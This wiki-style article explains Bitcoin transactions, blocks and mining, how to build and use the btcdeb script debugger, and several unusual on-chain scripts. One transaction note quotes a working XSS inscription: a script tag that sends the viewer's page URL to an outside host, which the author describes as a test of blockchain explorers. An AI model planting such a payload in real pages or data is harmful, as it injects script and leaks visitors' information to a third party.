by Ciro Santilli (@cirosantilli, 32)
Here is a very direct description of the system:
  • each transaction (transaction is often abbreviated "tx") has a list of inputs, and a list of outputs
  • each input is the output of a previous transaction. You verify your identity as the indented receiver by producing a digital signature for the public key specified on the output
  • each output specifies the public key of the receiver and the value being sent
  • the sum of output values cannot obvious exceed the sum of input values. If it is any less, the leftover is sent to the miner of the transaction as a transaction fee, which is an incentive for mining.
  • once an output is used from an input, it becomes marked as spent, and cannot be reused again. Every input uses the selected output fully. Therefore, if you want to use an input of 1 BTC to pay 0.1 BTC, what you do is to send 0.1 BTC to the receiver, and 0.9 BTC back to yourself as change. This is why the vast majority of transactions has two outputs: one "real", and the other change back to self.
Code 1. "Sample Bitcoin transaction graph" illustrates these concepts:
  • tx0: magic transaction without any inputs, i.e. either Genesis block or a coinbase mining reward. Since it is a magic transaction, it produces 3 Bitcoins from scratch: 1 in out0 and 2 in out1. The initial value was actually 50 BTC and reduced with time: Section "Bitcoin halvening"
  • tx1: regular transaction that takes:
    • a single input from tx0 out0, with value 1
    • produces two outputs:
      • out0 for value 0.5
      • out1 for value 0.3
    • this means that there was 0.2 left over from the input. This value will be given to the miner that mines this transaction.
    Since this is a regular transaction, no new coins are produced.
  • tx2: regular transaction with a single input and a single output. It uses up the entire input, leading to 0 miner fees, so this greedy one might (will?) never get mined.
  • tx3: regular transaction with two inputs and one output. The total input is 2.3, and the output is 1.8, so the miner fee will be 0.5
                   tx1                     tx3
  tx0            +---------------+       +---------------+
+----------+     | in0           |       | in0           |
| out0     |<------out: tx0 out0 |  +------out: tx1 out1 |
| value: 1 |     +---------------+  |    +---------------+
+----------+     | out0          |  |    | in1           |
| out1     |<-+  | value: 0.5    |  | +----out: tx2 out0 |
| value: 2 |  |  +---------------+  | |  +---------------+
+----------+  |  | out1          |<-+ |  | out1          |
              |  | value: 0.3    |    |  | value: 1.8    |
              |  +---------------+    |  +---------------+
              |                       |
              |                       |
              |                       |
              |    tx2                |
              |  +---------------+    |
              |  | in0           |    |
              +----out: tx0 out1 |    |
                 +---------------+    |
                 | out0          |<---+
                 | value: 2      |
                 +---------------+
Code 1. Sample Bitcoin transaction graph.
Since every input must come from a previous output, there must be some magic way of generating new coins from scratch to bootstrap the system. This mechanism is that when the miner mines successfully, they get a mining fee, which is a magic transaction without any valid inputs and a pre-agreed value, and an incentive to use their power/compute resources to mine. This magic transaction is called a "coinbase transaction".
The key innovation of Bitcoin is how to prevent double spending, i.e. use a single output as the input of two different transactions, via mining.
For example, what prevents me from very quickly using a single output to pay two different people in quick succession?
The solution are the blocks. Blocks discretize transactions into chunks in a way that prevents double spending.
A block contains:
  • a list of transactions that are valid amongst themselves. Notably, there can't be double spending within a block.
    People making transactions send them to the network, and miners select which ones they want to add to their block. Miners prefer to pick transactions that are:
    • small, as less bytes means less hashing costs. Small generally means "doesn't have a gazillion inputs/outputs".
    • have higher transaction fees, for obvious reasons
  • the ID of its parent block. Blocks therefore form a linear linked list of blocks, except for temporary ties that are soon resolved. The longest known list block is considered to be the valid one.
  • a nonce, which is an integer chosen "arbitrarily by the miner"
For a block to be valid, besides not containing easy to check stuff like double spending, the miner must also select a nonce such that the hash of the block starts with N zeroes.
For example, considering the transactions from Code 1. "Sample Bitcoin transaction graph", the block structure shown at Code 2. "Sample Bitcoin blockchain" would be valid. In it block0 contains two transactions: tx0 and tx1, and block1 also contains two transactions: tx2 and tx3.
 block0           block1             block2
+------------+   +--------------+   +--------------+
| prev:      |<----prev: block0 |<----prev: block1 |
+------------+   +--------------+   +--------------+
| txs:       |   | txs:         |   | txs:         |
| - tx0      |   | - tx2        |   | - tx4        |
| - tx1      |   | - tx3        |   | - tx5        |
+------------+   +--------------+   +--------------+
| nonce: 944 |   | nonce: 832   |   | nonce: 734   |
+------------+   +--------------+   +--------------+
Code 2. Sample Bitcoin blockchain.
The nonces are on this example arbitrary chosen numbers that would lead to a desired hash for the block.
block0 is the Genesis block, which is magic and does not have a previous block, because we have to start from somewhere. The network is hardcoded to accept that as a valid starting point.
Now suppose that the person who created tx2 had tried to double spend and also created another transaction tx2' at the same time that looks like this: 
  tx2'
+---------------+
| in0           |
| out: tx0 out1 |
+---------------+
| out0          |
| value: 2      |
+---------------+
Clearly, this transaction would try to spend tx0 out1 one more time in addition to tx2, and should not be allowed! If this were attempted, only the following outcomes are possible:
  • block1 contains tx2. Then when block2 gets made, it cannot contain tx2', because tx0 out1 was already spent by tx2
  • block1 contains tx2'. tx2 cannot be spent anymore
Notably, it is not possible that block1 contains both tx2 and tx2', as that would make the block invalid, and the network would not accept that block even if a miner found a nonce.
Since hashes are basically random, miners just have to try a bunch of nonces randomly until they find one that works.
The more zeroes, the harder it is to find the hash. For example, on the extreme case where N is all the bits of the hash output, we are trying to find a hash of exactly 0, which is statistically impossible. But if e.g. N=1, you will in average have to try only two nonces, N=2 four nonces, and so on.
The value N is updated every 2 weeks, and aims to make blocks to take 10 minutes to mine on average. N has to be increased with time, as more advanced hashing hardware has become available.
Once a miner finds a nonce that works, they send their block to the network. Other miners then verify the block, and once they do, they are highly incentivized to stop their hashing attempts, and make the new valid block be the new parent, and start over. This is because the length of the chain has already increased: they would need to mine two blocks instead of one if they didn't update to the newest block!
Therefore if you try to double spend, some random miner is going to select only one of your transactions and add it to the block.
They can't pick both, otherwise their block would be invalid, and other miners wouldn't accept is as the new longest one.
Then sooner or later, the transaction will be mined and added to the longest chain. At this point, the network will move to that newer header, and your second transaction will not be valid for any miner at all anymore, since it uses a spent output from the first one that went in. All miners will therefore drop that transaction, and it will never go in.
The goal of having this mandatory 10 minutes block interval is to make it very unlikely that two miners will mine at the exact same time, and therefore possibly each one mine one of the two double spending transactions. When ties to happen, miners randomly choose one of the valid blocks and work on top of it. The first one that does, now has a block of length L + 2 rather than L + 1, and therefore when that is propagated, everyone drops what they are doing and move to that new longest one.
Tested on Ubuntu 23.10: 
sudo apt install libtool
git clone https://github.com/bitcoin-core/btcdeb
cd btcdeb
git checkout 4fd007e57b79cba9b5ffdf5ffe599778c0d63b88
./autogen.sh
./configure
make -j
Patch submited at: github.com/bitcoin-core/btcdeb/pull/143
Then we use it; 
./btcdeb '[OP_1 OP_2 OP_ADD]'
and inside the shell: 
btcdeb 5.0.24 -- type `./btcdeb -h` for start up options
LOG: signing segwit taproot
notice: btcdeb has gotten quieter; use --verbose if necessary (this message is temporary)
3 op script loaded. type `help` for usage information
script  |  stack 
--------+--------
1       | 
2       | 
OP_ADD  | 
#0000 1
btcdeb> step
                <> PUSH stack 01
script  |  stack 
--------+--------
2       |      01
OP_ADD  | 
#0001 2
btcdeb> step
                <> PUSH stack 02
script  |  stack 
--------+--------
OP_ADD  |      02
        |      01
#0002 OP_ADD
btcdeb> step
                <> POP  stack
                <> POP  stack
                <> PUSH stack 03
script  |  stack 
--------+--------
        |      03
btcdeb> step
script  |  stack 
--------+--------
        |      03
btcdeb> step
at end of script
btcdeb>
Authors: Peilin Zheng, Xiapu Luo, Zibin Zheng
Epic title.
Ouptut 0 disassembles as: 
OP_IF OP_INVALIDOPCODE 4effffffff <large constant> OP_ENDIF
The large constant contains an ASCII Bitcoin Core patch entitled Remove (SINGLE|DOUBLE)BYTE so presumably this is a proof of concept: 
From a3a61fef43309b9fb23225df7910b03afc5465b9 Mon Sep 17 00:00:00 2001
From: Satoshi Nakamoto <satoshin@gmx.com>
Date: Mon, 12 Aug 2013 02:28:02 -0200
Subject: [PATCH] Remove (SINGLE|DOUBLE)BYTE

I removed this from Bitcoin in f1e1fb4bdef878c8fc1564fa418d44e7541a7e83
in Sept 7 2010, almost three years ago. Be warned that I have not
actually tested this patch.
---
 backends/bitcoind/deserialize.py |    8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/backends/bitcoind/deserialize.py b/backends/bitcoind/deserialize.py
index 6620583..89b9b1b 100644
--- a/backends/bitcoind/deserialize.py
+++ b/backends/bitcoind/deserialize.py
@@ -280,10 +280,8 @@ opcodes = Enumeration("Opcodes", [
     "OP_WITHIN", "OP_RIPEMD160", "OP_SHA1", "OP_SHA256", "OP_HASH160",
     "OP_HASH256", "OP_CODESEPARATOR", "OP_CHECKSIG", "OP_CHECKSIGVERIFY", "OP_CHECKMULTISIG",
     "OP_CHECKMULTISIGVERIFY",
-    ("OP_SINGLEBYTE_END", 0xF0),
-    ("OP_DOUBLEBYTE_BEGIN", 0xF000),
     "OP_PUBKEY", "OP_PUBKEYHASH",
-    ("OP_INVALIDOPCODE", 0xFFFF),
+    ("OP_INVALIDOPCODE", 0xFF),
 ])
 
 
@@ -293,10 +291,6 @@ def script_GetOp(bytes):
         vch = None
         opcode = ord(bytes[i])
         i += 1
-        if opcode >= opcodes.OP_SINGLEBYTE_END and i < len(bytes):
-            opcode <<= 8
-            opcode |= ord(bytes[i])
-            i += 1
 
         if opcode <= opcodes.OP_PUSHDATA4:
             nSize = opcode
-- 
1.7.9.4
bitcointalk.org/index.php?topic=5231222.0 duscusses what happens if there is an invalid opcode in a branch that is not taken.
As mentioned at the prize was claimed at 8d31992805518fd62daa3bdd2a5c4fd2cd3054c9b3dca1d78055e9528cff6adc (2017-02-23) which spends several inputs with the same unlock script that presents two different constantants that have the same SHA-1: 
printf 255044462d312e330a25e2e3cfd30a0a0a312030206f626a0a3c3c2f57696474682032203020522f4865696768742033203020522f547970652034203020522f537562747970652035203020522f46696c7465722036203020522f436f6c6f7253706163652037203020522f4c656e6774682038203020522f42697473506572436f6d706f6e656e7420383e3e0a73747265616d0affd8fffe00245348412d3120697320646561642121212121852fec092339759c39b1a1c63c4c97e1fffe017f46dc93a6b67e013b029aaa1db2560b45ca67d688c7f84b8c4c791fe02b3df614f86db1690901c56b45c1530afedfb76038e972722fe7ad728f0e4904e046c230570fe9d41398abe12ef5bc942be33542a4802d98b5d70f2a332ec37fac3514e74ddc0f2cc1a874cd0c78305a21566461309789606bd0bf3f98cda8044629a1 | xxd -r -p | sha1sum
printf 255044462d312e330a25e2e3cfd30a0a0a312030206f626a0a3c3c2f57696474682032203020522f4865696768742033203020522f547970652034203020522f537562747970652035203020522f46696c7465722036203020522f436f6c6f7253706163652037203020522f4c656e6774682038203020522f42697473506572436f6d706f6e656e7420383e3e0a73747265616d0affd8fffe00245348412d3120697320646561642121212121852fec092339759c39b1a1c63c4c97e1fffe017346dc9166b67e118f029ab621b2560ff9ca67cca8c7f85ba84c79030c2b3de218f86db3a90901d5df45c14f26fedfb3dc38e96ac22fe7bd728f0e45bce046d23c570feb141398bb552ef5a0a82be331fea48037b8b5d71f0e332edf93ac3500eb4ddc0decc1a864790c782c76215660dd309791d06bd0af3f98cda4bc4629b1 | xxd -r -p | sha1sum
both giving 
f92d74e3874587aaf443d1db961d4e26dde13e9c
It was claimed on the same day that Google disclosed the collision: security.googleblog.com/2017/02/announcing-first-sha1-collision.html
Both of these are PDF prefixes, so they start with the PDF file signature, but are not fully viewable PDFs on their own.
This contains various outputs that seem trivially spendable in a made up of two non-zero constants, e.g.: 
    {
      "value": 0.00002000,
      "n": 9,
      "scriptPubKey": {
        "asm": "1 8fe61f026c7545a99c6e0f37a5a7eceee5fdf6723c1994ccbfb740556632e9fe",
        "desc": "rawtr(8fe61f026c7545a99c6e0f37a5a7eceee5fdf6723c1994ccbfb740556632e9fe)#lxgt8lak",
        "hex": "51208fe61f026c7545a99c6e0f37a5a7eceee5fdf6723c1994ccbfb740556632e9fe",
        "address": "bc1p3lnp7qnvw4z6n8rwpum6tflvamjlmanj8svefn9lkaq92e3ja8lqcc8mcx",
        "type": "witness_v1_taproot"
      }
    },
Or are we missing something? The values are quite small and wouldn't be worth it the miner fees most likely. But is there a fundamental reason why this couldn't be spent by a non-standard miner?
Output 0 does: 
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP
where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers: 
<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>`
This is almost spendable with: 
1 OP_TOALTSTACK 10 1 2
but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
Sister transaction of 4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af with another variant of the XSS but without IF and OP_FROMALTSTACK, thus making it spendable: 
OP_ADD OP_ADD 13 OP_EQUAL <large xss constant> OP_DROP
In this malformed Coinbase transaction, the mining pool "nicehash" produced a provably unspendable Bitcoin output script due to a bug, and therefore lost most of the entire block reward of 6.25 BTC then worth about $ 123,000.
The output is unspendable because it ends in a constant 0, the disassembly of the first and main output is this series of constants: 
0 017fed86bba5f31f955f8b316c7fb9bd45cb6cbc 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
and for the second smaller one: 
aa21a9ed62ec16bf1a388c7884e9778ddb0e26c0bf982dada47aaa5952347c0993da 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
the third one being an OP_RETURN message.
They appear to be included, with rationale that you can already include syntactically valid crap in an unprovable way: github.com/bitcoin/bitcoin/issues/320 Better then have syntactically invalid crap that is provable.
The outputs of this transaction seem to be the first syntactically incorrect scripts of the blockchain: blockchain.info/tx/ebc9fa1196a59e192352d76c0f6e73167046b9d37b8302b6bb6968dfd279b767?format=json, found by parsing everything locally. The transaction was made in 2013 for 0.1 BTC, which then became unspendable.
The first invalid script is just e.g. "script":"01", which says will push one byte into the stack, but then ends prematurely.
cointelegraph.com/learn/bitcoin-halving-how-does-the-halving-cycle-work-and-why-does-it-matter Happens every 210,000 blocks, aiming approximately at 4 year intervals. The historical dates were:
  • 50 BTC initially
  • 1st: 2012: down to 25 BTC
  • 2nd: 2016: down to 12.5 BTC
  • 3rd: 2020: down to 6.25 BTC
Each of these events prompts some commemorative inscriptions: Section "Halvening messages".

Ancestors

  1. Bitcoin
  2. List of cryptocurrencies
  3. Cryptocurrency
  4. Blockchain
  5. Money
  6. Social technology
  7. Area of technology
  8. Technology
  9. Index

Incoming links

Discussion (0)

Sign up or sign in create discussions.

There are no discussions about this article yet.

View article source